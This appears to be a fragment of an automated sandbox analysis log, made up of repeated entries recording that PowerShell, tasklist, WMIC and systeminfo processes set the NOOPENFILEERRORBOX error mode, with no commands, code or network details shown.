Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
